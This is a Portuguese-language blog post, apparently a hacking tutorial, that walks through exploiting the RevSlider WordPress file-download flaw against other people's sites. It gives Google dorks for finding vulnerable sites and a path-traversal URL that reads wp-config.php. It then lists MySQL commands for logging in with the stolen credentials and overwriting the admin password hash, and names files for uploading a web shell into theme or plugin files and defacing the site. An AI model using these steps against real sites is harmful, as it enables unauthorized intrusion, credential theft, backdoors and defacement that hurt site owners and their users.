quinta-feira, 22 de janeiro de 2015

WordPress File Disclosure Vulnerability - Plugin Revslider + Upload Shell + Defacement

Bom pessoal,
Hoje vou falar de uns vulnerabilidades no wordpress  é a wordpress Multiple Themes Arbitrary File Download  com elas conseguimos algumas credencias
como: host do mysql, user do mysql,pass do mysql
Essas vulnerabilitade o Risco é bem alto para o servidor,  com podemos trocar a senha do administrator e assim entra no painel  do worpress, e urpando algum $code malicioso para o servidor,  assim tendo nosso proprio panel, ou backdoor, ou mesmo MakeDefacement.
Eu nao conhecia essa vul, quem me falou foi skeleton a uns dois meses atras,  mais a muitos e muitos servidores nao corrigidos.
Exploit-db
# WordPress Ultimate Theme Arbitrary File Download
# Risk: High
# CWE number: CWE-200
# Author: Hugo Santiago
# Contact: hugo.s@linuxmail.org
# Date: 31/08/2014
# Vendor Homepage: http://www.techerhut.com/download-x-v1-7-5-the-ultimate-wordpress-theme-themeforest/
# Tested on: Windows 7 and Gnu/Linux
# Exploit(Revslide):
  1. Google Dork: "Index of"  +/wp-content/themes/ultimate/
  2.  "Patch vul : /wp-content/themes/ultimate/"
  3. Google Dork: "Index of" +/wp-content/themes/IncredibleWP/
  4.  "Patch vul : /wp-content/themes/IncredibleWP/"
  5. Google Dork: "Index of" +/wp-content/themes/ultimatum
  6.  "Patch vul : /wp-content/themes/ultimatum/"
  7. Google Dork: "Index of" +/wp-content/themes/medicate/
  8.  "Patch vul : /wp-content/themes/medicate/"
  9. Google Dork: "Index of" +/wp-content/themes/Centum/
  10.  "Patch vul : /wp-content/themes/Centum/"
  11. Google Dork: "Index of" +/wp-content/themes/Avada/
  12.  "Patch vul : /wp-content/themes/Avada/"
  13. Google Dork: "Index of" +/wp-content/themes/striking_r/
  14.  "Patch vul : /wp-content/themes/striking_r/"
  15. Google Dork: "Index of" +/wp-content/themes/beach_apollo/
  16.  "Patch vul : /wp-content/themes/beach_apollo/"
  17. Google Dork: "Index of" +/wp-content/themes/cuckootap/
  18.  "Patch vul : /wp-content/themes/cuckootap/"
For this exploit ::
dork :  revslider.php "index of" site:**
           inurl:/revslider/rs-plugin/videojs/video-js.swf
           inurl:/revslider/rs-plugin/videojs/


+  Dicas de Buscas
  • inurl:wp-content/plugins/revslider site:
  • inurl:framework/plugins/revslider/ site:
Poc:
/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
Exemple:
http://victim/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
QUANDO ABRIR O ARQUIVO VOCÊ VERA ALGO IGUAL ISSO:
EXEMPLO
O que pode ser feito,trocar senha de admin, logar no painel Wordpress:
Ativar ou instalar alguns plugins para urpar nossa shell e ver uns dicas de diretoria para plugins e themas
USE O NMAP PARA VERIFICAR A PORTA 3306
Logar no servidor mysql
COMMANDOS:
mysql --host endereço_do_mysql.com --user usuario_aqui --password='senha_aqui'
Vizualizar o banco de dados:
mysql> SHOW databases;
Usar o banco worddeep:
mysql> USE worddeep;
Vizualiza as tabelas:
mysql> SHOW tables;
Seleciona a tabela usuarios:
mysql> SELECT * FROM wp_users;
Atualiza uma senha um usuario:
mysql> UPDATE `nome_banco`.`nome_tabela` SET `nome_coluna`='$P$BeZiobCs7WNKp1mkSz2nujcQb6tbes0' WHERE `nome_tabela`.`ID`=1;
Diretorios
DIR /wp-content/themes/twentyfourteen/404.php
DIR /wp-content/plugins/akismet/index.php
DIR /wp-content/plugins/hello.php     
Arquivos usado no video download
deUpload.php
deShell.php
deDeface.php
Video Demo

0 comentários:

Postar um comentário